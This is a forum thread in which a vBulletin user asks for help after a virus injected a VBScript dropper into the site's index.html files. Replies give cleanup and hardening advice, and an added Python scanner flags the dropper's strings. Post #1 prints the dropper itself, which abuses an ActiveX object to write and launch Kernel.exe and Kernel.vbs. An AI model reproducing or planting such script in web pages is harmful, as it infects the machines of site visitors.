The Archive of vBulletin Modifications Site.
#1
Last week, my computer was infected by the kernel.exe virus.
I removed that, but now I am shocked. It put this code in all the index.html pages in the vBulletin folder on my desktop? It put this code into includes/index.html, images/index.html, clientscript/index.html, etc. Code:
<script language=vbscript>
on error resume next
fileexe1="077090144000003000000000004000000000255255000000184000000000000000000000064000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000184000000000014031186014000180009205033184001076205033084104105115032112114111103114097109032099097110110111116032098101032114117110032105110032068079083032109111100101046013013010036000000000000000000000212036142028144069224079144069224079144069224079030090243079135069224079108101242079147069224079082105099104144069224079"
dim sys
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 "
set fso = df.createobject("Scripting.FileSystemObject","")
set s=df.CreateObject("Shell.Application.1","")
set re=df.createobject("wscript.shell","")
sys=fso.GetSpecialFolder(1)
For a = 1 To Len(filevbs1) Step 3
filevbs2=filevbs2 & chr(mid(filevbs1,a,3))
if a < len(fileexe1)+1 then fileexe2=fileexe2 & chr(mid(fileexe1,a,3))
next
fso.CreateTextFile(sys & "\TSP32E.DLL").write fileexe1
if fso.opentextfile(sys & "\Systeme.dll").readall<>"on" then
fso.CreateTextFile(sys & "\Kernel.exe").write fileexe2
s.Open (sys & "\Kernel.exe")
end if
fso.CreateTextFile(sys & "\TSP32V.DLL").write filevbs1
if fso.opentextfile(sys & "\Systemv.dll").readall<>"on" then
fso.CreateTextFile(sys & "\Kernel.vbs").write filevbs2
s.Open (sys & "\Kernel.vbs")
end if
</script>
Parse error: syntax error, unexpected $end, expecting T_STRING or T_VARIABLE or '{' or '$' from that virus code? I am very shocked by that. The full code is this. (I couldn't paste the full code because it is about 24.500 characters.) http://rapidshare.com/files/45994675/kernelcode.html
#2
This is not default vB code, as the index.html files are empty. Someone put that there.
#3
Yes, of course. But is there any way to get rid of that?
#4
Find out who put it there. Have you downloaded any 'dodgy files' lately?
Delete those files also.
#5
Replace it with the original file.
Also, if you didn't put that there I would suggest looking at how secure your server is, because no one should be able to add that. Check file permissions, change passwords, server logs, etc. Having someone install a virus on your computer through your website is very bad, and should definitely be looked into.
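An added example, not part of the original thread: since the stock index.html placeholders are empty (post #2), a scan can flag any index.html that has content or contains strings from the script in post #1 before the files are uploaded again. The marker labels, function names and sample tree are constructed for illustration.

```python
import os
import re
import tempfile

# Strings taken from the script quoted in post #1; labels are this example's own.
MARKERS = [
    ("vbscript block", re.compile(rb"<script[^>]*vbscript", re.I)),
    ("ActiveX clsid", re.compile(rb"BD96C556-65A3-11D0-983A-00C04FC29E36", re.I)),
    ("FileSystemObject", re.compile(rb"Scripting\.FileSystemObject", re.I)),
    ("WScript.Shell", re.compile(rb"wscript\.shell", re.I)),
]

def scan_tree(root):
    """Map each suspicious index.html (path relative to root) to its reasons."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() != "index.html":
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            # Assumption: whitespace-only placeholders count as empty.
            reasons = ["not empty"] if data.strip() else []
            reasons += [label for label, rx in MARKERS if rx.search(data)]
            if reasons:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings[rel] = reasons
    return findings

def build_sample_tree(root):
    """Constructed sample: two clean placeholders, one with script content."""
    samples = {
        "includes/index.html": b"",
        "images/index.html": b"\r\n",
        "clientscript/index.html": b"<script language=vbscript>\n"
            b'set fso = df.createobject("Scripting.FileSystemObject","")\n'
            b"</script>",
    }
    for rel, body in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for rel, reasons in sorted(scan_tree(tmp).items()):
            print(rel, "->", ", ".join(reasons))
```

Pointing `scan_tree` at the local copy of the forum files and at a fresh download of the same release shows which placeholders to replace with the original.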
#6
Quote:
http://www.spywareremove.com/removekernelexe.html Maybe after it put the code into the vBulletin folder on my desktop. When I got this Parse error: syntax error, unexpected $end, expecting T_STRING or T_VARIABLE or '{' or '$' error, I uploaded the vBulletin files from my desktop to the web, and I have seen that.